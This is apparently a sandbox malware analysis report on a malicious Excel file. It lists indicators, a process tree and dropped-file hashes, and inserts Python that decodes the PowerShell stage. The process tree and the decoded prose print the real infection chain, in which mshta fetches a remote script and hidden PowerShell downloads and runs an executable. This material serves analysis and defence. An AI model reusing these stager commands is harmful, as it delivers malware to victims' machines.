iptrackeronline.com | Migracion colombia detalles de su Proceso pendiente.doc | malicious | 45.55.57.244
iptrackeronline.com | 29Purchase Details Quotation.exe | malicious | 45.55.57.244
jplymell.com | PO52P91df9bc210ac7cd131524cc_Invoice.xlsb | malicious | 185.223.28.211
jplymell.com | PO52P91df9bc210ac7cd131524cc_Invoice.xlsb | malicious | 185.223.28.211
jplymell.com | PO52P91df9bc210ac7cd131524cc_Invoice.xlsb | malicious | 185.223.28.211
jplymell.com | 2019-08-Past Due Invoice_PO83928345.xls | malicious | 195.201.76.133
jplymell.com | 2019-08-Past Due Invoice_PO83928345.xls | malicious | 195.201.76.133
jplymell.com | 2019-08-Past Due Invoice_PO83928345.xls | malicious | 195.201.76.133
jplymell.com | 92413-014sQhEafVAI8CE5wRHIdG4N.xlsb | malicious | 189.38.24.21
jplymell.com | 92413-014sQhEafVAI8CE5wRHIdG4N.xlsb | malicious | 189.38.24.21
jplymell.com | 92413-014sQhEafVAI8CE5wRHIdG4N.xlsb | malicious | 189.38.24.21

ASN

Match | Associated Sample Name / URL | Detection | Context
The ASN of both contacted IPs is unknown; the two "unknown" matches list the same associated samples, given once here:
unknown | IRS_LETTER.xltm | malicious | 185.223.28.211
unknown | 5.45.79.15/input/?mark=20191025-www.centrocor.em.art.br/v2zga&tpl=XXXXXXXXXXXXXXXXXXXXXX | malicious | 185.211.246.22
unknown | arorapc.homelinux.com | malicious | 185.29.134.87
unknown | BEOs.pdf | malicious | 3.3.0.2
unknown | CRE_7467205210957048.vbs | malicious | 216.108.227.103
unknown | www.santecza.com | malicious | 46.105.201.240
unknown | 70-2211-3591614888.doc | malicious | 39.106.149.23
unknown | CRE_7467205210957048.vbs | malicious | 216.108.227.103
unknown | copy-Inv. doc 20191126_91654.xls | malicious | 124.156.35.183
unknown | https://app.nihaocloud.com/d/daa8bf555d32471ea8cb/files/?p=/Research Review.pdf | malicious | 178.159.36.237
unknown | 0479306-200213.xls | malicious | 162.255.119.24
unknown | Project3 (1).doc | malicious | 41.233.206.59
unknown | copy-Inv. doc 20191126_91654.xls | malicious | 124.156.35.183
unknown | 0479306-200213.xls | malicious | 162.255.119.24
unknown | 0479306-200213.xls | malicious | 192.64.119.71
unknown | #U266bVAudio4687272-37541.wav.htm | malicious | 192.99.245.102
unknown | copy-Inv. doc 20191126_91654.xls | malicious | 124.156.35.183
unknown | yaml-bench | malicious | 2.56.212.84
unknown | info.rkeindustries.info/r.php?93758590 | malicious | 194.76.225.14
unknown | executable.2772.exe | malicious | 23.253.46.64

JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
54328bd36c14bd82ddaa0c04b25ed9ad | copy-Inv. doc 20191126_91654.xls | Get hash | malicious | Browse | 45.55.57.244
54328bd36c14bd82ddaa0c04b25ed9ad | #Uc190#Uc775 #Ubd84#Uc11d #Ub0b4#Uc6a9_26_November_2019.doc | Get hash | malicious | Browse | 45.55.57.244
54328bd36c14bd82ddaa0c04b25ed9ad | SCAN_November_2019.doc | Get hash | malicious | Browse | 45.55.57.244
54328bd36c14bd82ddaa0c04b25ed9ad | bitmainantminer.filmko.info/wp-admin/PgCOTmQbizotGmxUCYOquZJqkqcgTO/ | Get hash | malicious | Browse | 45.55.57.244
54328bd36c14bd82ddaa0c04b25ed9ad | bitmainantminer.filmko.info/wp-admin/PgCOTmQbizotGmxUCYOquZJqkqcgTO/ | Get hash | malicious | Browse | 45.55.57.244
54328bd36c14bd82ddaa0c04b25ed9ad | manhattanportage.com.tw/wp-content/themes/emilio/ia1oowqlvf12fiwpa86hxkwt9hwzni48c8id/ | Get hash | malicious | Browse | 45.55.57.244
54328bd36c14bd82ddaa0c04b25ed9ad | https://anril.cf/8a56/ZBmVvsbnpZWhCCikncOAlaSfl/ | Get hash | malicious | Browse | 45.55.57.244
54328bd36c14bd82ddaa0c04b25ed9ad | 0291108-892261.xls | Get hash | malicious | Browse | 45.55.57.244
54328bd36c14bd82ddaa0c04b25ed9ad | 0224014-429068.xls | Get hash | malicious | Browse | 45.55.57.244
54328bd36c14bd82ddaa0c04b25ed9ad | s.exe | Get hash | malicious | Browse | 45.55.57.244
54328bd36c14bd82ddaa0c04b25ed9ad | message 2019_11_20 90351.doc | Get hash | malicious | Browse | 45.55.57.244
54328bd36c14bd82ddaa0c04b25ed9ad | dati DX_65738.doc | Get hash | malicious | Browse | 45.55.57.244
54328bd36c14bd82ddaa0c04b25ed9ad | JigsawRansomware.exe | Get hash | malicious | Browse | 45.55.57.244
54328bd36c14bd82ddaa0c04b25ed9ad | DwnldShdl.exe | Get hash | malicious | Browse | 45.55.57.244
54328bd36c14bd82ddaa0c04b25ed9ad | 3269_06227.doc | Get hash | malicious | Browse | 45.55.57.244
54328bd36c14bd82ddaa0c04b25ed9ad | 4450733197.doc | Get hash |malicious | Browse | 45.55.57.244
54328bd36c14bd82ddaa0c04b25ed9ad | securefiless-001-site1.ftempurl.com/639474.zip | Get hash | malicious | Browse | 45.55.57.244
54328bd36c14bd82ddaa0c04b25ed9ad | FACT. 7-7-73904167.doc | Get hash | malicious | Browse | 45.55.57.244

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w10x64

EXCEL.EXE (PID: 3896, cmdline: 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' /automation -Embedding, MD5: D672D26C85AEB9536B9736BF04054969)
rundll32.exe (PID: 2752, cmdline: rUNDlL32.eXe SHELL32.DLL,ShellExec_RunDLL mSHta.Exe VbsCripT:CLOSe (geTObJEct ('SCRipT:https://jplymell.com/serb.xml') ), MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
mshta.exe (PID: 5072, cmdline: 'C:\Windows\system32\mSHta.Exe' VbsCripT:CLOSe (geTObJEct ('SCRipT:https://jplymell.com/serb.xml') ), MD5: 7083239CE743FDB68DFC933B7308E80A)
cmd.exe (PID: 980, cmdline: 'C:\Windows\system32\cmd.exe' '/c pOweRsHeLL.Exe -eX uNRestRictED -Nop -W HiDDEn -ec IAAJACAAIAAJACAACQAgACAACQAJACAAIAAgAAkAIAAJAAkAUwBFAHQALQBjAG8AbgB0AGUAbgBUACAACQAJAAkACQAJAAkACQAJAAkACQAtAFYAYQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACgAIAAgACAACQAJAC4AKABDAE8AbQBNAGEATgBEACAAbgBlAHcALQBPAEIAagBFAGMAVAApAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAATgBlAFQALgBXAGUAQgBjAEwAaQBlAE4AVAAJACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAACQApAC4ARABPAFcAbgBsAG8AQQBkAGQAQQB0AEEAKAAgACAAIAAJAB0gaAB0AHQAcABzADoALwAvAGoAcABsAHkAbQBlAGwAbAAuAGMAbwBtAC8AcgBvAG8AdAB3AGUAYgAvAGEAcABwAGwAZQBwAGUAZwAuAGoAcABnAB0gCQAgACAAIAAgACAAIAAgACAAIAAgAAkAKQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAtAEUAbgAgACAACQAJACAACQAgACAACQAgAAkACQAJAEIAeQB0AGUAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAAkALQBwAGEAdABoACAACQAJAAkACQAJAAkACQAJAB0gJABFAG4AVgA6AGwATwBjAGEATABBAFAAUABkAGEAdABhAFwAUwBpAGwAdgBlAHAAdQByAGkAdAB5AC4AZQB4AGUAHSAgACAAIAA7AAkAIAAJACAACQAgAAkACQAJAAkACQAJACAACQAgACAAIABJAG4AdgBPAEsARQAtAGUAeABwAHIAZQBzAHMASQBvAE4AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAB0gJABlAE4AVgA6AGwAbwBjAGEATABBAHAAcABEAGEAdABBAFwAUwBpAGwAdgBlAHAAdQByAGkAdAB5AC4AZQB4AGUAHSA= ', MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 4384, cmdline: C:\Windows\system32\conhost.exe 0x4, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
powershell.exe (PID: 4500, cmdline: pOweRsHeLL.Exe -eX uNRestRictED -Nop -W HiDDEn -ec IAAJACAAIAAJACAACQAgACAACQAJACAAIAAgAAkAIAAJAAkAUwBFAHQALQBjAG8AbgB0AGUAbgBUACAACQAJAAkACQAJAAkACQAJAAkACQAtAFYAYQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACgAIAAgACAACQAJAC4AKABDAE8AbQBNAGEATgBEACAAbgBlAHcALQBPAEIAagBFAGMAVAApAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAATgBlAFQALgBXAGUAQgBjAEwAaQBlAE4AVAAJACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAACQApAC4ARABPAFcAbgBsAG8AQQBkAGQAQQB0AEEAKAAgACAAIAAJAB0gaAB0AHQAcABzADoALwAvAGoAcABsAHkAbQBlAGwAbAAuAGMAbwBtAC8AcgBvAG8AdAB3AGUAYgAvAGEAcABwAGwAZQBwAGUAZwAuAGoAcABnAB0gCQAgACAAIAAgACAAIAAgACAAIAAgAAkAKQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAtAEUAbgAgACAACQAJACAACQAgACAACQAgAAkACQAJAEIAeQB0AGUAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAAkALQBwAGEAdABoACAACQAJAAkACQAJAAkACQAJAB0gJABFAG4AVgA6AGwATwBjAGEATABBAFAAUABkAGEAdABhAFwAUwBpAGwAdgBlAHAAdQByAGkAdAB5AC4AZQB4AGUAHSAgACAAIAA7AAkAIAAJACAACQAgAAkACQAJAAkACQAJACAACQAgACAAIABJAG4AdgBPAEsARQAtAGUAeABwAHIAZQBzAHMASQBvAE4AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAB0gJABlAE4AVgA6AGwAbwBjAGEATABBAHAAcABEAGEAdABBAFwAUwBpAGwAdgBlAHAAdQByAGkAdAB5AC4AZQB4AGUAHSA= ', MD5: DBA3E6449E97D4E3DF64527EF7012A10)
Silvepurity.exe (PID: 2816, cmdline: C:\Users\user\AppData\Local\Silvepurity.exe, MD5: 243C81F2A749C38B3C4318ED77AC8001)
schtasks.exe (PID: 1728, cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tjInWEsrJITP' /XML 'C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp', MD5: 15FF7D8324231381BAD48A052F85DF04)
conhost.exe (PID: 5076, cmdline: C:\Windows\system32\conhost.exe 0x4, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
Silvepurity.exe (PID: 4264, cmdline: C:\Users\user\AppData\Local\Silvepurity.exe, MD5: 243C81F2A749C38B3C4318ED77AC8001)
cleanup
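The cmd.exe and powershell.exe entries above pass the second stage as an -ec (-EncodedCommand) argument: base64 over the UTF-16LE text of the script, padded with runs of tabs and spaces and written in random case to dodge string matches. The Python below is an added example, not part of the Joe Sandbox report: it pulls the blob out of a command line, decodes it, collapses the padding, and lifts the URLs and %LOCALAPPDATA%-relative paths out as indicators. The blob is the one printed in the Startup list; the two command lines reassembled for the demo, and the function and regex names, are mine.

```python
import base64
import re

# The -ec argument as it appears on the cmd.exe / powershell.exe lines in
# the Startup list above (copied from the report; the PDF's line wraps
# split it into pieces, which are simply concatenated here).
ENCODED_COMMAND = (
    "IAAJACAAIAAJACAA"
    "CQAgACAACQAJACAAIAAgAAkAIAAJAAkAUwBFAHQALQBjAG8AbgB0AGUAbgBUACAACQAJAAkACQAJAAkACQAJAAkACQAtAFYAYQAgACAAIAAgAC"
    "AAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACgAIAAgACAACQAJAC4AKABDAE8AbQBNAGEATgBEACAAbgBlAHcALQBPAEIAagBFAGMAVAAp"
    "AAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAATgBlAFQALgBXAGUAQgBjAEwAaQBlAE4AVAAJACAAIAAgACAAIAAgACAAIAAgACAAIA"
    "AgACAAIAAgACAAIAAgACAAIAAgACAACQApAC4ARABPAFcAbgBsAG8AQQBkAGQAQQB0AEEAKAAgACAAIAAJAB0gaAB0AHQAcABzADoALwAvAGoA"
    "cABsAHkAbQBlAGwAbAAuAGMAbwBtAC8AcgBvAG8AdAB3AGUAYgAvAGEAcABwAGwAZQBwAGUAZwAuAGoAcABnAB0gCQAgACAAIAAgACAAIAAgAC"
    "AAIAAgAAkAKQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAtAEUAbgAgACAACQAJACAACQAgACAACQAgAAkACQAJAEIAeQB0AGUAIAAg"
    "ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAAkALQBwAGEAdABoACAACQAJAAkACQAJAAkACQAJAB0gJABFAG4AVgA6AGwATw"
    "BjAGEATABBAFAAUABkAGEAdABhAFwAUwBpAGwAdgBlAHAAdQByAGkAdAB5AC4AZQB4AGUAHSAgACAAIAA7AAkAIAAJACAACQAgAAkACQAJAAkA"
    "CQAJACAACQAgACAAIABJAG4AdgBPAEsARQAtAGUAeABwAHIAZQBzAHMASQBvAE4AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAA"
    "kACQAJAB0gJABlAE4AVgA6AGwAbwBjAGEATABBAHAAcABEAGEAdABBAFwAUwBpAGwAdgBlAHAAdQByAGkAdAB5AC4AZQB4AGUAHSA="
)

# Command lines reassembled from the Startup list (constructed input for
# the demo): the rundll32 stage carries the stager URL, the cmd stage the blob.
PROCESS_CMDLINES = [
    "rUNDlL32.eXe SHELL32.DLL,ShellExec_RunDLL mSHta.Exe VbsCripT:CLOSe "
    "(geTObJEct ('SCRipT:https://jplymell.com/serb.xml') )",
    "'C:\\Windows\\system32\\cmd.exe' '/c pOweRsHeLL.Exe -eX uNRestRictED "
    "-Nop -W HiDDEn -ec " + ENCODED_COMMAND + " '",
]

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand for the same
# parameter; -eX (ExecutionPolicy) must not match, hence the explicit list.
_EC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=\s]+)")
_STOP = r"""\s"'“”;()"""   # characters that terminate a URL or path literal
_URL = re.compile(rf"https?://[^{_STOP}]+")
_ENV_PATH = re.compile(rf"\$env:[a-z_]+\\[^{_STOP}]+", re.IGNORECASE)


def extract_encoded_argument(cmdline: str) -> str:
    """Return the base64 blob that follows the -EncodedCommand flag, with
    any whitespace (PDF wraps, copy/paste breaks) removed."""
    m = _EC_FLAG.search(cmdline)
    if not m:
        raise ValueError("no -EncodedCommand argument found")
    return re.sub(r"\s+", "", m.group(1))


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 over the UTF-16LE script text. validate=True
    rejects a blob that was mangled in transit instead of decoding garbage."""
    raw = base64.b64decode(re.sub(r"\s+", "", blob), validate=True)
    return raw.decode("utf-16-le")


def normalize(script: str) -> str:
    """Collapse the tab/space padding the sample uses as filler."""
    return " ".join(script.split())


def extract_iocs(text: str) -> dict:
    return {"urls": _URL.findall(text), "paths": _ENV_PATH.findall(text)}


def _dedupe(items):
    """Keep first occurrence, comparing case-insensitively (the script
    spells $env:LOCALAPPDATA two different ways)."""
    seen, out = set(), []
    for item in items:
        if item.lower() not in seen:
            seen.add(item.lower())
            out.append(item)
    return out


def analyze(cmdlines) -> dict:
    """Decode every -EncodedCommand payload in the command lines and collect
    URLs and env-relative paths from the decoded scripts and the plain lines."""
    decoded, urls, paths = [], [], []
    for line in cmdlines:
        if _EC_FLAG.search(line):
            line = normalize(decode_encoded_command(extract_encoded_argument(line)))
            decoded.append(line)
        iocs = extract_iocs(line)
        urls += iocs["urls"]
        paths += iocs["paths"]
    return {"decoded": decoded, "urls": _dedupe(urls), "paths": _dedupe(paths)}


if __name__ == "__main__":
    result = analyze(PROCESS_CMDLINES)
    for script in result["decoded"]:
        print("decoded:", script)
    print("urls:", result["urls"])
    print("paths:", result["paths"])
```

With the padding collapsed and the abbreviated parameters expanded the way PowerShell resolves them (-Va to -Value, -En to -Encoding, and `Command` to Get-Command through the implicit Get- prefix), the decoded script is `Set-Content -Value (New-Object Net.WebClient).DownloadData("https://jplymell.com/rootweb/applepeg.jpg") -Encoding Byte -Path "$env:LOCALAPPDATA\Silvepurity.exe"; Invoke-Expression "$env:LOCALAPPDATA\Silvepurity.exe"`, which accounts for the Silvepurity.exe processes that follow powershell.exe in the list. The quote characters in the blob are U+201D, not ASCII quotes, which is why the stop-character class includes them.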

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\Silvepurity.exe.log
  Process: C:\Users\user\AppData\Local\Silvepurity.exe
  File Type: ASCII text, with CRLF line terminators
  Size (bytes): 655
  Entropy (8bit): 5.242666464794316
  Encrypted: false
  MD5: BB2F7221C5B3CAAA16A10F5D73D66647
  SHA1: F31B352B6CEA48265696E667462EF104B6CAFBD2
  SHA-256: 0206A436411AF0F119836DFFF3AE9695D2F0DD6600F411BD4E8E78130509B59F
  SHA-512: CAA168ECE4D5A2365CD357BD2B05CC796A8F73F9DD14EC1ED90A5BD2E3FA1A3A3A445CD2A6B40F9590F689C8F58B8CACEAE426558CAD46D80F846F0B74326639
  Malicious: false
  Reputation: moderate, very likely benign file
  Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\d72bdddce94cd6438f15999de0b0afb6\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\49235fda2a08f24faad85fb3459473ea\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\2c2c76fa2618c73769de74395defcb73\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\de48966e0cee99c51fd157e946ff9c4d\System.Management.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\10e08475dc461c7289efd159e9f0e339\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\770487D9-02FE-47E0-A0E7-708B7933C2FB
  Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
  File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
  Size (bytes): 113928
  Entropy (8bit): 5.3782317445628385
  Encrypted: false
  MD5: FCEC6A64339741F1811294765184D718
  SHA1: C91CC0D4016F7802530C03E801B658E54F821DC5
  SHA-256: FC924722912EF6095D57A9623B82889952A250E59D7326E35EFEE91264311D67
  SHA-512: 5115D826DFDE33904E913F3B2E6C2813F341F527C1C3BA670ED202AFD84D747215AC69A9E1F9F7793B1FC793DE00472F19542C5597F407EFCC658956F24655CB
  Malicious: false
  Reputation: low
  Preview: .... .. Build: 16.0.12321.30526-->.. .. .. .. .. https://rr.office.microsoft.com/research/query.asmx.. .. .. https://o15.officeredir.microsoft.com/r.. .. .. https://o15.officeredir.microsoft.com/r.. .. .. https://[MAX.BaseHost]/client/results.. .. .. https://[MAX.BaseHost]/client/results.. .. .. https://ocsa.office.microsoft.com/client/15/help/template.. ..

C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml
  Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
  File Type: XML 1.0 document, ASCII text, with very long lines, with no line terminators
  Size (bytes): 309906
  Entropy (8bit): 5.17741396832073
  Encrypted: false
  MD5: B14444FCD0C2B45E2C7086D10B4B7A64
  SHA1: 0C3F6E8601E37A51B1CB825E2709DEDC04EF9D58
  SHA-256: EB7E7EE2EF4F5EBD1957F0915522181446C9EE776140822DDA82207A8E2B3881
  SHA-512: E33E68A8B57B4E638FE19A31FA89FD5ABE8F9F36EECC11A752FD5C75C5A15781BC81113CCAC55B3287B1E2544F6B538E638B79218BEAA230AE770C8D90AA70D9
  Malicious: false
  Reputation: low
  Preview:

C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db
  Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
  File Type: SQLite 3.x database, last written using SQLite version 3019003
  Size (bytes): 4096
  Entropy (8bit): 0.09237477444559435
  Encrypted: false
  MD5: 1A9A28416CE9CCB568FC28191B8B1267
  SHA1: 49BD37DCB1210C3DCDACE52393537FA0197EC14F
  SHA-256: 9B8EC34DF5486C537505C5B582CD27519C114BE8EB58098E1C6F7DCCDF63C617
  SHA-512: 516998D8F0639272541EF5DFE99EF0B73281F320CB6014AEDF96E5D415DA301CED8E1ADF38A7514D3279BE9B850A2C3F8D21A385C03F520351AAAF4FD693AABA
  Malicious: false
  Reputation: high, very likely benign file
  Preview: SQLite format 3...... @ ......

C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-journal
  Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
  File Type: data
  Size (bytes): 524
  Entropy (8bit): 0.27937671757176796
  Encrypted: false
  MD5: 8BE17DD40BBFCED8FD480EE5F97669DC
  SHA1: BBDA4B53D5E620D49A92FC1ACF73CF1B73B592C5
  SHA-256: D9ADCACD9966152DB59570B2B90C3731B0CED1699F769D9D92CFF5DEE4247C3B
  SHA-512: F572960536E46BA558B45E2B22812F93C31C91FBC02E57F1E3F46947A838B29CB7677B8CFCEDB63B48C857D467516BCB2FD43A2108FA4F42783F9907B743E3D4
  Malicious: false
  Preview: ...... U...... c.....

C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal
  Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
  File Type: SQLite Write-Ahead Log, version 3007000
  Size (bytes): 37112
  Entropy (8bit): 0.403099554755285
  Encrypted: false
  MD5: 33AACAD59A8CF7718CBE1EA7E20D2740
  SHA1: 949AAF497D78EA90E878E49BB8061ABC185A3AF4
  SHA-256: DF00453A004BEDE9CFC5638E4F0A361F2AEB3B147F4E65DF4F823AB2E2BF4403
  SHA-512: E59C6C32B0B2ED67629E3E596130CD7FD98C0FF32940C18DB3A4B04F9E6B5E1A818DF0DDE5411E43894C0A44728CCCC0F8D1C4B19319919382878D65A84F414D
  Malicious: false
  Preview: 7....-...... g|.O...... qo.TI.SQLite format 3...... @ ......

C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.session
  Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
  File Type: SQLite 3.x database, last written using SQLite version 3019003
  Size (bytes): 61440
  Entropy (8bit): 0.45380896434419704
  Encrypted: false
  MD5: 23E9B199B44AAB9ADC5C04ED7CDAD285
  SHA1: 1B182AF2857B1B80E9FC1F50655834896A5CBD56
  SHA-256: 9EA99074DF8591346344DAC6CDFD65D5DEDBD1E4BAD02CD2A58FBF338CD2E100
  SHA-512: 3142E0D6948B9BDE3399109CE46B0F6B5E121F70399BA66360D1E4CFB06411BA80B091BE9AE46EED9796DADD9FEB36548FBC72BFBD05CDF302F03B9DB3A77B41
  Malicious: false
  Preview: SQLite format 3...... @ ......

C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.session-journal
  Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
  File Type: data
  Size (bytes): 44184
  Entropy (8bit): 0.4750025192437787
  Encrypted: false
  MD5: 2C6E2BEAB3924067C101AEF2A0A64B33
  SHA1: 58C5A19D1625A7D6C60694864AC8A9E0C54437F5
  SHA-256: 61AFE35E8391BA1FE47957F41AFCAFABC369D9008ED146065A9C4D44A2FDA420
  SHA-512: 9E296A7EB406FA5406B15B7FA0B82C750AFBABE0FD359DF7BF44FBAE67BF7CF40F24E526B5E209B1E48C12B7AC0EB0F75BC42BAAE4C5EE38C6D2D48F1FA420A6
  Malicious: false
  Preview: ...... Yg)...... c...... oYj......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\598669F3.jpg
  Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
  File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 712x473, frames 3
  Size (bytes): 26463
  Entropy (8bit): 7.788417674458919
  Encrypted: false
  MD5: D73892D40A40A79173BDFB8F15233896
  SHA1: A8001583A114EECDF3F8BDF228282FE31D21205E
  SHA-256: F078FDEA04C4ECFECA5B3B56257FEDB2BA57633CD032DDDA1918D395AABC383D
  SHA-512: 07F412E464C2364688A5AA953806BDB6AF9242F863DAF1C96C7C2E6D741DAE35D6D2B3B2AA4CD17BB795663CAAE5C7174AD5CAFAF23B2649339D7324B95505D1
  Malicious: false
  Preview: ...... JFIF...... C...... C...... "...... @...... !1..AQ...... "2BR Saq...... $4C..3b.#%5...... 1.!."...... ?...... hc0...E...:.{...... h.7.P...:.b..+.W...... S..1..V.Cu..|.a...h.U.....V.\....y..|...j...=...... y../.a.y..|...... ^jp...~ .W.^...... n....^j...?.y.....:...,. 9W../...)...!..[u...*.S..0.<.a...i.l.!e....a..z.5Xo...U.Cu...a..z..S..1..V.Cu..|..~.z..U..1.u][email protected]...<[email protected]_5x_...uM.7P...V...... <.aW. ...T.\....*.U...... [email protected]...|[email protected]...<[email protected]...<..~.z.[u...).Q..1.<..~.z.[u...)[email protected][email protected]_...<..~.z.Wu...).S..1...N..G..[ u...*.S..1.<[email protected]...*}...0..<[email protected]_...<[email protected]..?h.U.....U.Cur..>..?..../..C.n.Cu..|....h.S..1..V.Cu

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6A10AB79.tmp
  Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
  File Type: Microsoft Excel 2007+
  Size (bytes): 39016
  Entropy (8bit): 7.943402047473203
  Encrypted: false
  MD5: AC9CFCC82AF323CC0C17DE432C1A3B7D
  SHA1: 8F6DEBAA24AD9A5330D316F29AE94BEF2EDD5323
  SHA-256: F2FE7D16A4205AEEB8E0FBB09BAEA9E0D8CA55D26EC03DFBDF694BD2CAD3D106
  SHA-512: 8923BC7111EE2EDA82D4206E07803B977D455AF04D170FD8B76046DDE4846823CE87FDC8E3B6D3F2CCF957566B67EFB28B5F7FE8DEE12B687168E61ED2B695E6
  Malicious: true
  Antivirus: Joe Sandbox ML, Detection: 100%
  Preview: PK..-...... !.`r...... [Content_Types].xml...... T.N.0..#....(v..B...X..p...... 1.}..$...6...... 3cO.w[..f.14.ZND.AGcC...... @0.b.F.....b..KH...5bYJ....%z ....,b.P.3.*.^C...dr.t ..C.K.!f._..WW..-o.N.6..~....)9..pXm....XX.r3...W..P..V..Bf}gf..=.I.0..?...h...... HF.9....8.B.9...=.afk.z.\...,.u.-..<....... e..<..Md.q...T_PK..-...... !.79.`...... xl/workbook.xml....X...... v...... U]o.8.}_i...a.\l.$.MG|j#..N.}.4r.)V.3...... $..C.....8...s...m.G&....&g.XW..w.s.....lKi.U.....OL.....|#..^...... }.8..YK..Y.+K![...... %.....m...NKyg.."....\.e.\...;.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6A10AB79.tmp:Zone.Identifier
  Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
  File Type: ASCII text, with CRLF line terminators
  Size (bytes): 26
  Entropy (8bit): 3.95006375643621
  Encrypted: false
  MD5: 187F488E27DB4AF347237FE461A079AD
  SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
  SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
  SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
  Malicious: true
  Preview: [ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\serb[1].xml
  Process: C:\Windows\SysWOW64\mshta.exe
  File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
  Size (bytes): 2023
  Entropy (8bit): 4.973425220253087
  Encrypted: false
  MD5: B409BA3B666DA2B4D5AA271682C62890
  SHA1: 63B74A339F85E4A98976EBA3E4A93393ED61D72C
  SHA-256: 08267A7C2EC07C35C76FFDE5E4EFA763DAC2AD6706B9B9DFEF67DB85745DE5EC
  SHA-512: E7B79316D9CF5124200A05F2EC297CEA25A630C5A2E667ACA406193510E49808A3BA0BE572378106CBC159DD71CAAE2DFFC140FA836967D2E308428AFBB8AD07
  Malicious: false
  Yara Hits: Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\serb[1].xml, Author: Florian Roth
  Preview: ......
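Each dropped-file record above carries an "Entropy (8bit)" value and, for the cached workbook, a Zone.Identifier stream whose contents are fully visible in the preview. The Python below is an added example, not code from the Joe Sandbox report: it computes the same per-byte Shannon entropy the report lists, checks a local copy of a file against the reported value, and parses the Mark-of-the-Web stream to name the zone. The 26-byte Zone.Identifier content is reconstructed from the preview (the exact placement of the two CRLFs is an assumption); the ZoneId=3 sample in the test and the function names are mine.

```python
import math
from collections import Counter

# Names of the URL security zones a Zone.Identifier stream can carry.
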